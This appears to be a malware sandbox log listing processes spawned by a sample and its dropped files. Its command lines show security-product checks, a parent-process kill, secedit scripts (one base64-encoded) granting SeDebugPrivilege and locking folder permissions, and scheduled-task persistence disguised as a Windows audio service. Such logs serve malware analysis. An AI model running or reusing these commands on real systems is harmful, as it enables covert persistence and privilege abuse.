                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\Lets-x64.exeProcess created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\inst.ini
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                              Source: C:\ProgramData\Program\iusb3mon.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
